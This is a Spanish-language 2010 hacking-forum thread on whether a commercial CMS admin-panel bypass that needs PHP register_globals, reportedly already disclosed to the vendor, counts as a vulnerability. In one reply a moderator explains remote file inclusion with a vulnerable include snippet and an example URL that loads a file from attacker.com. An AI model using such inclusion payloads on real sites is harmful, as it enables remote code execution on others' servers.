elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Duda ¿se considera vulnerable?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda ¿se considera vulnerable?  (Leído 2,552 veces)
bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Duda ¿se considera vulnerable?
« en: 3 Junio 2010, 13:19 pm »

Hola, ojeando el codigo de un CMS comercial vi que puedo ver el panel de administracion y supongo que con las pruebas satisfactorias hasta el momento me puedo crear un usuario en el grupo admin y luego logearme tranquilamente (esto de momento no lo he probado, solo el listar usuarios). no necesito ser usuario logeado previamente para lograr ver el panel de administracion, el unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable? ya que estando en off, no lo es (o eso creo yo).
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.721


$M


Ver Perfil WWW
Re: Duda ¿se considera vulnerable?
« Respuesta #1 en: 3 Junio 2010, 20:01 pm »

Lo haz hecho o no? Solo son hipótesis?
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Re: Duda ¿se considera vulnerable?
« Respuesta #2 en: 3 Junio 2010, 20:15 pm »

si si, claro que esta hecho. ya esta reportado y lo estan arreglando :).

la duda era si al tener que estar register_globals en on se podria considerar vulnrable.
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.721


$M


Ver Perfil WWW
Re: Duda ¿se considera vulnerable?
« Respuesta #3 en: 3 Junio 2010, 20:27 pm »

Cuando las register_globals estan activadas en php.ini, puede permitir que un usuario inicialice varias variables no inicializadas anteriormente de manera remota.

Muchas veces esto es utilizado para que un usuario malévolo pueda incluir ficheros no deseados y le permite ejecutar código arbitrario desde una localización remota.

Por ejemplo:
Código
  1. require ($page. ?.php?);

Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.

Este sería un ejemplo:
Código:
    "www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt"

Más información: :http://www.desarrolloweb.com/articulos/principales-vulnerabilidades-web.html
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Re: Duda ¿se considera vulnerable?
« Respuesta #4 en: 3 Junio 2010, 21:00 pm »

si, si lo tengo claro. lo que quiero decir es si se considera vulnerable ya que no todos los servidores tienen register_globals en on, simplemente eso :).
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.721


$M


Ver Perfil WWW
Re: Duda ¿se considera vulnerable?
« Respuesta #5 en: 3 Junio 2010, 21:03 pm »

Leiste bien?
Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Re: Duda ¿se considera vulnerable?
« Respuesta #6 en: 3 Junio 2010, 21:21 pm »

me leiste bien tu al principio?

Citar
el unico problema es que register_globals necesita estar en on... ¿se puede considerar entonces vulnerable?

en ningun momento pregunte que hace register_globals. sabia que poniendolo en on, podia saltarme el formulario de login, pero no sabia si se considera vulnerable al depender de register_globals.

En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Duda ¿se considera vulnerable?
« Respuesta #7 en: 3 Junio 2010, 21:42 pm »

jaja vaya discusión...

yo pienso que como vulnerabilidad se podría considerar... pero dudo mucho que algun servidor comercial tenga el registr_globals a on :/ ya que no es opcion por defecto y no se me ocurre ningun beneficio de ello (aparte de ahorrarse los $_GET y esas cosas xD )
En línea

Colaboraciones:
1 2
bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Re: Duda ¿se considera vulnerable?
« Respuesta #8 en: 3 Junio 2010, 22:14 pm »

por eso mismo tenia mis dudas, pero vamos que hay mas server de los que parecen con esta opcion activada.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Snowden se considera un soplón pero con muy buenas intenciones
Noticias
almafuerte25 0 903 Último mensaje 19 Octubre 2013, 14:19 pm
por almafuerte25
Duda - Simular entorno vulnerable
Seguridad
mr-medi 4 1,072 Último mensaje 17 Diciembre 2019, 23:33 pm
por @XSStringManolo
El antiguo y conocido servicio rexec vulnerable (duda)
Hacking
retr02332 0 1,172 Último mensaje 24 Agosto 2020, 01:37 am
por retr02332
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines